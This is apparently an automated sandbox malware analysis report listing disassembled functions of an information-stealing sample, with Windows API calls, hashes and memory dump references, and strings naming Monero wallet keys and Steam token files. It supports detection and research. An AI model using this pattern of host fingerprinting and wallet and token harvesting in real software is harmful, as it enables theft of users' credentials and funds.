Instruction ID: 99555d903d208c5a698327a69c8e575a1115c65859d0a6045b594acca336fbad
Opcode Fuzzy Hash: 95d759bfc830274fc86c174cf660c75e6a2e7d1813462dd8b4f93451219dd016
Instruction Fuzzy Hash: EC816575A10204EFDF18EF68D995AEDB7B5BF94340F50C529E80A9B241DB34AA05CBC2

Function 007778E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00777910
RtlAllocateHeap.NTDLL(00000000), ref: 00777917
GetComputerNameA.KERNEL32(?,00000104), ref: 0077792F

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID:
API String ID: 1664310425-0
Opcode ID: 0010ffcf87323b075d4cef86f6df9f5d2a511dee5c725214d913669157729ab6
Instruction ID: 19e49e4b07d3c7fe8ff540ddd1c986941da4b84a18ae0695759b3fbfcee54e04
Opcode Fuzzy Hash: 0010ffcf87323b075d4cef86f6df9f5d2a511dee5c725214d913669157729ab6
Instruction Fuzzy Hash: F40186B1948205EBCB14DF98DD45BAABBB8FB05B61F108219F645E3280C37C5904CBA2

Function 6CB93060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6CB93095

Part of subcall function 6CB935A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6CC1F688,00001000), ref: 6CB935D5
Part of subcall function 6CB935A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6CB935E0
Part of subcall function 6CB935A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6CB935FD
Part of subcall function 6CB935A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6CB9363F
Part of subcall function 6CB935A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6CB9369F
Part of subcall function 6CB935A0: __aulldiv.LIBCMT ref: 6CB936E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CB9309F

Part of subcall function 6CBB5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6CBB56EE,?,00000001), ref: 6CBB5B85
Part of subcall function 6CBB5B50: EnterCriticalSection.KERNEL32(6CC1F688,?,?,?,6CBB56EE,?,00000001), ref: 6CBB5B90
Part of subcall function 6CBB5B50: LeaveCriticalSection.KERNEL32(6CC1F688,?,?,?,6CBB56EE,?,00000001), ref: 6CBB5BD8
Part of subcall function 6CBB5B50: GetTickCount64.KERNEL32 ref: 6CBB5BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6CB930BE

Part of subcall function 6CB930F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6CB93127
Part of subcall function 6CB930F0: __aulldiv.LIBCMT ref: 6CB93140

Part of subcall function 6CBCAB2A: __onexit.LIBCMT ref: 6CBCAB30

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: 511b1c83238e3b6e435ac6bc73e532a8531eada74e71b8616a312bc994363ee2
Instruction ID: 06e0cf75c6726c631332522314822d1a50ddc1911cdf4d9f34c23b7014ab7ecf
Opcode Fuzzy Hash: 511b1c83238e3b6e435ac6bc73e532a8531eada74e71b8616a312bc994363ee2
Instruction Fuzzy Hash: 61F0F922E207889BCA10DF7588425EE7374BF6B114F115329E89C63A21FF20A1D88386

Function 00779470 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00779484
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 007794A5
CloseHandle.KERNEL32(00000000), ref: 007794AF

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: a7efbfc3454709d8706a9643273f69bd753a0f9260cf25dc963edaf21b82434a
Instruction ID: 5ad2682ce87c9a7daf349c478edf92574775a38574fd0a680e23b2fcdce71b55
Opcode Fuzzy Hash: a7efbfc3454709d8706a9643273f69bd753a0f9260cf25dc963edaf21b82434a
Instruction Fuzzy Hash: 35F03A7490020CFBDB04DFA4DC4AFEE7778EB08300F008498BA0997290D7B46E85DB91

Function 00761110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0076112B
VirtualAllocExNuma.KERNEL32(00000000), ref: 00761132
ExitProcess.KERNEL32 ref: 00761143

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: c0d7d80d19bb1e924622f4004d0f81a0ff683b21beceb9f742abd8599b39490d
Instruction ID: 8f988a2711b84730013407c6f0bb7433b0bd47c2ec43c89d70b7106b2f6829d8
Opcode Fuzzy Hash: c0d7d80d19bb1e924622f4004d0f81a0ff683b21beceb9f742abd8599b39490d
Instruction Fuzzy Hash: DAE0E67095930CFFE7506BA49D0EB1D7678EF05B01F504054F709B65D0D7B92A40E6D9

Function 00771A10 Relevance: 3.9, APIs: 2, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

Part of subcall function 0077A9B0: lstrlen.KERNEL32(?,01259048,?,\Monero\wallet.keys,00780E17), ref: 0077A9C5
Part of subcall function 0077A9B0: lstrcpy.KERNEL32(00000000), ref: 0077AA04
Part of subcall function 0077A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0077AA12

Part of subcall function 0077A8A0: lstrcpy.KERNEL32(?,00780E17), ref: 0077A905

Part of subcall function 00777500: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00777542
Part of subcall function 00777500: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0077757F
Part of subcall function 00777500: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00777603
Part of subcall function 00777500: RtlAllocateHeap.NTDLL(00000000), ref: 0077760A

Part of subcall function 0077A920: lstrcpy.KERNEL32(00000000,?), ref: 0077A972
Part of subcall function 0077A920: lstrcat.KERNEL32(00000000), ref: 0077A982

Part of subcall function 00777690: GetProcessHeap.KERNEL32(00000000,00000104), ref: 007776A4
Part of subcall function 00777690: RtlAllocateHeap.NTDLL(00000000), ref: 007776AB

Part of subcall function 007777C0: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,0077DBC0,000000FF,?,00771C99,00000000,?,0125D910,00000000,?), ref: 007777F2
Part of subcall function 007777C0: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,0077DBC0,000000FF,?,00771C99,00000000,?,0125D910,00000000,?), ref: 007777F9

Part of subcall function 00777850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007611B7), ref: 00777880
Part of subcall function 00777850: RtlAllocateHeap.NTDLL(00000000), ref: 00777887
Part of subcall function 00777850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0077789F

Part of subcall function 007778E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00777910
Part of subcall function 007778E0: RtlAllocateHeap.NTDLL(00000000), ref: 00777917
Part of subcall function 007778E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0077792F

Part of subcall function 00777980: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00780E00,00000000,?), ref: 007779B0
Part of subcall function 00777980: RtlAllocateHeap.NTDLL(00000000), ref: 007779B7
Part of subcall function 00777980: GetLocalTime.KERNEL32(?,?,?,?,?,00780E00,00000000,?), ref: 007779C4
Part of subcall function 00777980: wsprintfA.USER32 ref: 007779F3

Part of subcall function 00777A30: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0125E110,00000000,?,00780E10,00000000,?,00000000,00000000), ref: 00777A63
Part of subcall function 00777A30: RtlAllocateHeap.NTDLL(00000000), ref: 00777A6A
Part of subcall function 00777A30: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0125E110,00000000,?,00780E10,00000000,?,00000000,00000000,?), ref: 00777A7D

Part of subcall function 00777B00: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,0125E110,00000000,?,00780E10,00000000,?,00000000,00000000), ref: 00777B35

Part of subcall function 00777B90: GetKeyboardLayoutList.USER32(00000000,00000000,007805AF), ref: 00777BE1
Part of subcall function 00777B90: LocalAlloc.KERNEL32(00000040,?), ref: 00777BF9
Part of subcall function 00777B90: GetKeyboardLayoutList.USER32(?,00000000), ref: 00777C0D
Part of subcall function 00777B90: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00777C62
Part of subcall function 00777B90: LocalFree.KERNEL32(00000000), ref: 00777D22

Part of subcall function 00777D80: GetSystemPowerStatus.KERNEL32(?), ref: 00777DAD

GetCurrentProcessId.KERNEL32(00000000,?,0125D9F0,00000000,?,00780E24,00000000,?,00000000,00000000,?,0125DFA8,00000000,?,00780E20,00000000), ref: 0077207E

Part of subcall function 00779470: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00779484
Part of subcall function 00779470: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 007794A5
Part of subcall function 00779470: CloseHandle.KERNEL32(00000000), ref: 007794AF

Part of subcall function 00777E00: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00777E37
Part of subcall function 00777E00: RtlAllocateHeap.NTDLL(00000000), ref: 00777E3E
Part of subcall function 00777E00: RegOpenKeyExA.KERNEL32(80000002,0124C158,00000000,00020119,?), ref: 00777E5E
Part of subcall function 00777E00: RegQueryValueExA.KERNEL32(?,0125D9D0,00000000,00000000,000000FF,000000FF), ref: 00777E7F
Part of subcall function 00777E00: RegCloseKey.ADVAPI32(?), ref: 00777E92

Part of subcall function 00777F60: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00777FC9
Part of subcall function 00777F60: GetLastError.KERNEL32 ref: 00777FD8

Part of subcall function 00777ED0: GetSystemInfo.KERNEL32(00780E2C), ref: 00777F00
Part of subcall function 00777ED0: wsprintfA.USER32 ref: 00777F16

Part of subcall function 00778100: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0125DFD8,00000000,?,00780E2C,00000000,?,00000000), ref: 00778130
Part of subcall function 00778100: RtlAllocateHeap.NTDLL(00000000), ref: 00778137
Part of subcall function 00778100: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00778158
Part of subcall function 00778100: __aulldiv.LIBCMT ref: 00778172
Part of subcall function 00778100: __aulldiv.LIBCMT ref: 00778180
Part of subcall function 00778100: wsprintfA.USER32 ref: 007781AC

Part of subcall function 007787C0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00780E28,00000000,?), ref: 0077882F
Part of subcall function 007787C0: RtlAllocateHeap.NTDLL(00000000), ref: 00778836
Part of subcall function 007787C0: wsprintfA.USER32 ref: 00778850

Part of subcall function 00778320: RegOpenKeyExA.KERNEL32(00000000,0125B498,00000000,00020019,00000000,007805B6), ref: 007783A4

Part of subcall function 00778320: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00778426
Part of subcall function 00778320: wsprintfA.USER32 ref: 00778459
Part of subcall function 00778320: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0077847B
Part of subcall function 00778320: RegCloseKey.ADVAPI32(00000000), ref: 0077848C
Part of subcall function 00778320: RegCloseKey.ADVAPI32(00000000), ref: 00778499

Part of subcall function 00778680: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,007805B7), ref: 007786CA
Part of subcall function 00778680: Process32First.KERNEL32(?,00000128), ref: 007786DE
Part of subcall function 00778680: Process32Next.KERNEL32(?,00000128), ref: 007786F3
Part of subcall function 00778680: CloseHandle.KERNEL32(?), ref: 00778761

lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0077265B

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$Allocate$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentHandleInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUser__aulldivlstrcatlstrlen$AllocComputerCreateDefaultDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleNextPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
String ID:
API String ID: 3113730047-0
Opcode ID: 7ea8fa9fadf995e05e32c049efa4401a2c76d7f8f1335c0ffdba3fcf93830bb1
Instruction ID: 13b5d2af9368a93955e5024cfaa1a0158e03a9ac0443bd130ae2a70bc9df473e
Opcode Fuzzy Hash: 7ea8fa9fadf995e05e32c049efa4401a2c76d7f8f1335c0ffdba3fcf93830bb1
Instruction Fuzzy Hash: 4A723C71810118FAEF5AFB60DC99DDE7378AF55340F50C2A9B12A62051EF343B49CE66

Function 00766D40 Relevance: 3.2, APIs: 2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1d785ed8730a8eb4d1b3b9550506a7f6603d62c3214d5f79e65462d910a1c80
Instruction ID: 80125bab06663b6047665f40940720c174016ed443ec285c70f0e5003e3d1ea2
Opcode Fuzzy Hash: d1d785ed8730a8eb4d1b3b9550506a7f6603d62c3214d5f79e65462d910a1c80
Instruction Fuzzy Hash: 016109B4900218EFCB14DF94E948BEEB7B0BB04304F548598E81A67281D779AF94DF91

Function 00775100 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

Part of subcall function 0077A820: lstrlen.KERNEL32(00764F05,?,?,00764F05,00780DDE), ref: 0077A82B
Part of subcall function 0077A820: lstrcpy.KERNEL32(00780DDE,00000000), ref: 0077A885

lstrlen.KERNEL32(00000000,00000000,00780ACA), ref: 0077512A

Strings

steam_tokens.txt, xrefs: 0077513F

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
